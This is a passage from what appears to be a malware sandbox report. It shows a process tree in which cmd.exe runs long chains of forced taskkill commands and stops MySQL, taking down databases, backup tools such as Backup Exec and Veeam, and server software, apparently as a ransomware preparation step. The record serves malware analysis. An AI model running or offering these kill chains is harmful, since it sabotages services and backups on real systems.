        taskkill /IM TNSLSNR.exe /F
        5⤵
        
        PID:2268
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM oracle.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM msdtc.exe /F
        5⤵
        
        PID:976
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM mmc.exe /F
        5⤵
        
        PID:944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM emagent.exe /F
        5⤵
        
        PID:2628
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SoftMgrLite.exe /F
        5⤵
        
        PID:2684
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UIODetect.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2380
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AutoDealService.exe /F
        5⤵
        
        PID:1816
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Admin.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2284
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM IDDAService.exe /F
        5⤵
        
        PID:1380
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM EnergyDataService.exe /F
        5⤵
        
        PID:2988
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM EnterprisePortal.exe /F
        5⤵
        
        PID:2256
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MPService.exe /F
        5⤵
        
        PID:3024
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TransMain.exe /F
        5⤵
        
        PID:2168
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DAService.exe /F
        5⤵
        
        PID:2676
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM tomcat7.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2808
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM cohernece.exe /F
        5⤵
        
        PID:2432
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM vmware-tray.exe /F
        5⤵
        
        PID:2140
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsDtsSrvr.exe /F
        5⤵
        
        PID:528
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F
        5⤵
        
        PID:1828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2632
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F
        5⤵
        
        PID:2680
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kingdee.K3.HR.Server.exe /F
        5⤵
        
        PID:2916
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F
        5⤵
        
        PID:1972
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM tomcat5.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
  - - C:\Windows\system32\cmd.exe
      cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
      4⤵
      PID:1980
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ThunderPlatform.exe /F
        5⤵
        
        PID:2396
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM iexplore.exe /F
        5⤵
        
        PID:2064
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM vm-agent.exe /F
        5⤵
        
        PID:1664
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM vm-agent-daemon.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2936
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MySQL
        6⤵
        
        PID:3000
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM eSightService.exe /F
        5⤵
        
        PID:2400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM cygrunsrv.exe /F
        5⤵
        
        PID:2440
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM wrapper.exe /F
        5⤵
        
        PID:1588
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM nginx.exe /F
        5⤵
        
        PID:2972
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM node.exe /F
        5⤵
        
        PID:2128
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sshd.exe /F
        5⤵
        
        PID:3068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM vm-tray.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM iempwatchdog.exe /F
        5⤵
        
        PID:3036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sqlwriter.exe /F
        5⤵
        
        PID:2764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM php.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2492
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "notepad++.exe" /F
        5⤵
        
        PID:1968
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "phpStudy.exe" /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM OPCClient.exe /F
        5⤵
        
        PID:2256
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM navicat.exe /F
        5⤵
        
        PID:2676
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SupportAssistAgent.exe /F
        5⤵
        
        PID:2240
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SunloginClient.exe /F
        5⤵
        
        PID:3068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SOUNDMAN.exe /F
        5⤵
        
        PID:2300
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM WeChat.exe /F
        5⤵
        
        PID:936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TXPlatform.exe /F
        5⤵
        
        PID:1264
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Tencentdll.exe /F
        5⤵
        
        PID:864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM httpd.exe /F
        5⤵
        
        PID:2748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM jenkins.exe /F
        5⤵
        
        PID:2896
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM QQ.exe /F
        5⤵
        
        PID:1068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM HaoZip.exe /F
        5⤵
        
        PID:2752
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM HaoZipScan.exe /F
        5⤵
        
        PID:536
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM navicat.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TSVNCache.exe /F
        5⤵
        
        PID:864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM RAVCpl64.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2116
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM secbizsrv.exe /F
        5⤵
        
        PID:2276
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM aliwssv.exe /F
        5⤵
        
        PID:1820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Helper_Haozip.exe /F
        5⤵
        
        PID:2696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM acrotray.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM "FileZilla Server Interface.exe" /F
        5⤵
        
        PID:1596
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM YoudaoNote.exe /F
        5⤵
        
        PID:2556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM YNoteCefRender.exe /F
        5⤵
        
        PID:2472
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM idea.exe /F
        5⤵
        
        PID:2488
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM fsnotifier.exe /F
        5⤵
        
        PID:2204
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM picpick.exe /F
        5⤵
        
        PID:564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM lantern.exe /F
        5⤵
        
        PID:2416
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sysproxy-cmd.exe /F
        5⤵
        
        PID:2004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM service.exe /F
        5⤵
        
        PID:3024
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM pcas.exe /F
        5⤵
        
        PID:2972
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM PresentationFontCache.exe /F
        5⤵
        
        PID:2188
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM RtWlan.exe /F
        5⤵
        
        PID:1200
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM monitor.exe /F
        5⤵
        
        PID:340
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Correspond.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2448
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ChatServer.exe /F
        5⤵
        
        PID:2708
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM InetMgr.exe /F
        5⤵
        
        PID:1828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM LogonServer.exe /F
        5⤵
        
        PID:2004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GameServer.exe /F
        5⤵
        
        PID:3008
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ServUAdmin.exe /F
        5⤵
        
        PID:2916
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ServUDaemon.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2312
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM update0.exe /F
        5⤵
        
        PID:2572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM server.exe /F
        5⤵
        
        PID:2320
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM w3wp.exe /F
        5⤵
        
        PID:268
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM notepad.exe /F
        5⤵
        
        PID:1864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM PalmInputService.exe /F
        5⤵
        
        PID:2592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM PalmInputGuard.exe /F
        5⤵
        
        PID:1996
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UpdateServer.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:620
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UpdateGate.exe /F
        5⤵
        
        PID:2116
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DBServer.exe /F
        5⤵
        
        PID:2460
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM LoginGate.exe /F
        5⤵
        
        PID:2548
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SelGate.exe /F
        5⤵
        
        PID:2636
  - - C:\Windows\system32\cmd.exe
      cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
      4⤵
      PID:2160
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Att.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM mdm.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BackupExecManagementService.exe /F
        5⤵
        
        PID:2516
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BackupExec.exe /F
        5⤵
        
        PID:2656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM bengine.exe /F
        5⤵
        
        PID:2276
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM benetns.exe /F
        5⤵
        
        PID:2916
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM beserver.exe /F
        5⤵
        
        PID:1084
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM pvlsvr.exe /F
        5⤵
        
        PID:2300
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM bedbg.exe /F
        5⤵
        
        PID:2704
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM beremote.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2236
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM beremote.exe /F
        5⤵
        
        PID:2172
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM beremote.exe /F
        5⤵
        
        PID:884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM beremote.exe /F
        5⤵
        
        PID:2640
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM RemoteAssistProcess.exe /F
        5⤵
        
        PID:2916
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BarMoniService.exe /F
        5⤵
        
        PID:2120
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GoodGameSrv.exe /F
        5⤵
        
        PID:1068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BarCMService.exe /F
        5⤵
        
        PID:1592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TsService.exe /F
        5⤵
        
        PID:2680
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GoodGame.exe /F
        5⤵
        
        PID:2436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BarServerView.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1084
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM IcafeServicesTray.exe /F
        5⤵
        
        PID:1100
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BsAgent_0.exe /F
        5⤵
        
        PID:2404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ControlServer.exe /F
        5⤵
        
        PID:2768
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DisklessServer.exe /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DumpServer.exe /F
        5⤵
        
        PID:620
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM NetDiskServer.exe /F
        5⤵
        
        PID:2436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM PersonUDisk.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2276
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM service_agent.exe /F
        5⤵
        
        PID:2304
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SoftMemory.exe /F
        5⤵
        
        PID:1888
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BarServer.exe /F
        5⤵
        Kills process with taskkill
        
        PID:400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM RtkNGUI64.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Serv-U-Tray.exe /F
        5⤵
        
        PID:2000
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM QQPCSoftTrayTips.exe /F
        5⤵
        
        PID:3032
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SohuNews.exe /F
        5⤵
        
        PID:2708
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Serv-U.exe /F
        5⤵
        
        PID:1348
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM QQPCRTP.exe /F
        5⤵
        
        PID:2004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM EasyFZS.exe /F
        5⤵
        
        PID:2296
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM HaoYiShi.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM HysMySQL.exe /F
        5⤵
        
        PID:2380
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM wtautoreg.exe /F
        5⤵
        
        PID:2884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ispiritPro.exe /F
        5⤵
        
        PID:1248
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CAService.exe /F
        5⤵
        
        PID:1796
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM XAssistant.exe /F
        5⤵
        
        PID:2920
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TrustCA.exe /F
        5⤵
        
        PID:1472
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GEUU20003.exe /F
        5⤵
        
        PID:2992
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CertMgr.exe /F
        5⤵
        
        PID:2948
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM eSafe_monitor.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2664
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MainExecute.exe /F
        5⤵
        
        PID:2504
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM FastInvoice.exe /F
        5⤵
        
        PID:2232
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SoftMgrLite.exe /F
        5⤵
        
        PID:2060
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sesvc.exe /F
        5⤵
        
        PID:1588
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ScanFileServer.exe /F
        5⤵
        
        PID:2616
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Nuoadehgcgcd.exe /F
        5⤵
        
        PID:1312
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM OpenFastAssist.exe /F
        5⤵
        
        PID:2984
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM FastInvoiceAssist.exe /F
        5⤵
        
        PID:1288
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Nuoadfaggcje.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2128
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM OfficeUpdate.exe /F
        5⤵
        
        PID:1832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM atkexComSvc.exe /F
        5⤵
        
        PID:2276
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM FileTransferAgent.exe /F
        5⤵
        
        PID:1068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MasterReplicatorAgent.exe /F
        5⤵
        
        PID:1632
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CrmAsyncService.exe /F
        5⤵
        
        PID:1968
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CrmAsyncService.exe /F
        5⤵
        
        PID:2296
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CrmUnzipService.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2712
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM NscAuthService.exe /F
        5⤵
        
        PID:2072
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ReplicaReplicatorAgent.exe /F
        5⤵
        
        PID:2456
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ASMCUSvc.exe /F
        5⤵
        
        PID:1808
  - - C:\Windows\system32\cmd.exe
